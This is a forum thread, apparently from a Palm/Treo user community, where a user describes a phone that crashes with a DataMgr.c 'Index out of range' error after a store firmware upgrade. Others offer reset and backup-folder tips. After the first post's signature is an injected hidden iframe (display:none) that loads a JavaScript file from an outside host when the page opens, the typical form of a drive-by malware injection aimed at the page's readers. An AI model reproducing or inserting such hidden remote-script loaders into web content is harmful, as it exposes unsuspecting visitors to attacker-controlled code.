+ Reply to Thread

FATAL ALERT DataMgr.c, Line: 9573, Index out of range

That's all i see.

FATAL ALERT
    DataMgr.c, Line: 9573, Index out of range

Did a hard reset and erased all data and it still doesn't work. I got a firmware upgrade today from the Monmouth Mall in Eatontown NJ. I don't know what version I had and I don't know what it moved too. I did go from Graffiti 1 to Graffiti 2 so I know it did something.

I assume I brought this upon myself. It was very stable before the upgrade despite a plethora of installed software. I hadn't visited this forum in a long while but knew my firmware was ancient. I asked the guy:

"It works well now so what does it get me."
    "Better performance. I've done a few and everybody is happy with it." he answered.

I quizzed him abit more:

"You have the latest MZ and SZ because if you do one w/o the other I think it can cause problems."
    "Yes. I have both."
    "You've done this before right?"
    "Yes, I'm the only guy in the store that does these phones"

I bit. I did a backup with the Free BackupBuddyVFS before I handed it over to him and walked out.

When I returned 45 minutes later (After some Chic Fil-a and shopping with my g/f) I grabbed my phone, turned it on and saw none of my data (and a Graffiti 2 icon among other changes). I restored from backup buddy but didn't overwrite everything. I only put back on apps that I know it didn't have (e.g. Mapopolis) and data that I know I had changed (e.g. address and memo). Still, I must've put back something I shouldn't have. It worked for an hour or two but now I get squat.

Right now I have a dead phone AND a dead palm (all eggs in one basket). The battery is out and I'll see where I stand in a few hours. For now it looks like it's back to the VZW store first thing in the morning.

Is there a list of things NOT to restore after a firmware upgrade?

P.S. Any vzw sales reps in the Mid-Atlantic want to hook me up (and get the commission) with the $44.99 unlimited EN let me know.

Thanks,

Dimes<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I was backup for a little while. Now I'm not. I have a feeling my network prefs are corrupt. When I was backup I couldn't even go into the prefs because it complained about the Network Prefs. The exact error escapes me and I can't even start my device.

Same error as before.

Backup. It seems I can start the device with a safe reset (Hold up when booting). When I go into prefs I see "Network Error: The network library is not available"

I hit OK.

I have no connections defined in my prefs either.

Sigh... I'll keep playing.

Can anybody give me there Connections DB. I think I might be all set then. I recreated things and will actually run w/o my phone number for a little while just to see if things are stable w/o my software/warez. I really do think running EN and qnc and the every buggy AIM all for the first time right after a firmware upgrade might've been a little crazy.

Livin' on the edge.

PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar

hard reset

Try a hard reset and see if that helps.

The next thing to try is to go to your palm directory and change the backup folder to a different name like backup1 and sync. This will not put anything on your palm from previous. See if that helps.

If that helps it might be better to just reinstall your software and then sync to get caught back up.

Hope you backed up your info before you had this issue. I had a similar type issue and once I did the rename folder routine it worked fine.

Hope this helps
    GREG HARKINS
    GREGHARKINS@BRINGINGFUNTOYOU.COM
    www.bringingfuntoyou.com

A hard reset originally didn't fix it. I left the batteries out and was able to start it. Things behaved badly for awhile. I redefined a few Connections (which had gone blank). Things seem fairly stable. I restored from backupbuddy but was sure to only restore things that i know i neded.

It seems healthy and stable... ...for now.

If your Connectiondb was blank, they didn't do the flash correctly. Read the upgrade thread on that one. The same thing happened to my sister who upgraded her ancient firmware at the VZW phone. She called VZW and after a couple of hours with the right tech, she was up and running.